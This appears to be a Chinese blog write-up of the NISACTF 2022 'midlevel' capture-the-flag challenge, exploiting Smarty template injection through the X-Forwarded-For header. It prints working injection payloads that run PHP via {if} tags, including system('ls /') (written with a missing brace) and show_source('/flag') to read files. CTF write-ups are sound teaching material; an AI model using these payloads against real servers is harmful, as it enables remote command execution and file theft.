[NISACTF 2022]midlevel

妙尽璇机2024-01-05 14:54

[NISACTF 2022]midlevel wp

信息搜集

进入页面,右上角显示了我的真实 IP :

最下面提示:Build With Smarty ! :

Smarty 是 PHP 的模板引擎,判断为 Smarty 模板注入。

Smarty 模板注入

推荐博客:Smarty模板注入&CVE-2017-1000480

抓包,添加 XFF 头为 127.0.0.1,测试回显:

成功回显。

if 语句命令执行

if 语句内可以执行任意 PHP 代码,不要加分号。

复制代码 
{if phpinfo()}{/if}

返回结果:

查看根目录下所有文件:

复制代码 
if system('ls /')}{/if}

返回结果:

发现 flag 。

读取 flag 文件:

复制代码 
{if show_source('/flag')}{/if}

返回结果:

拿到 flag 。

相关推荐
Whoisshutiao1 小时前
网安-XSS-pikachu
前端·安全·网络安全
薄荷椰果抹茶10 小时前
【网络安全基础】第六章---Web安全需求
安全·web安全
游戏开发爱好者817 小时前
iOS重构期调试实战:架构升级中的性能与数据保障策略
websocket·网络协议·tcp/ip·http·网络安全·https·udp
HumanRisk17 小时前
降低网络安全中的人为风险:以人为本的路径
网络·安全·web安全
安全系统学习20 小时前
系统安全之大模型案例分析
前端·安全·web安全·网络安全·xss
江苏思维驱动智能研究院有限公司1 天前
Sophos 网络安全:全球领先的自适应安全解决方案提供商
网络·安全·web安全
A5rZ1 天前
Puppeteer 相关漏洞-- Google 2025 Sourceless
网络安全
Bruce_Liuxiaowei1 天前
常见高危端口风险分析与防护指南
网络·网络安全·端口·信息搜集
2501_916013741 天前
iOS 多线程导致接口乱序?抓包还原 + 请求调度优化实战
websocket·网络协议·tcp/ip·http·网络安全·https·udp
头发那是一根不剩了1 天前
双因子认证(2FA)是什么?从零设计一个安全的双因子登录接口
网络安全·系统设计·身份认证
热门推荐
01集群聊天服务器---MySQL数据库的建立02GPU 进阶笔记(二):华为昇腾 910B GPU03Coze扣子平台完整体验和实践(附国内和国际版对比)04使用Ruby接入实时行情API教程05Word粘贴时出现“运行时错误53,文件未找到:MathPage.WLL“的解决方案06扣子(coze)实战|我用扣子搭建了一个自动分析小红薯笔记内容的AI应用|详细步骤拆解07Java学习第十五部分——MyBatis08扣子空间的使用教程与大模型技术思考09DeepSeek各版本说明与优缺点分析10基于odoo17的设计模式详解---装饰模式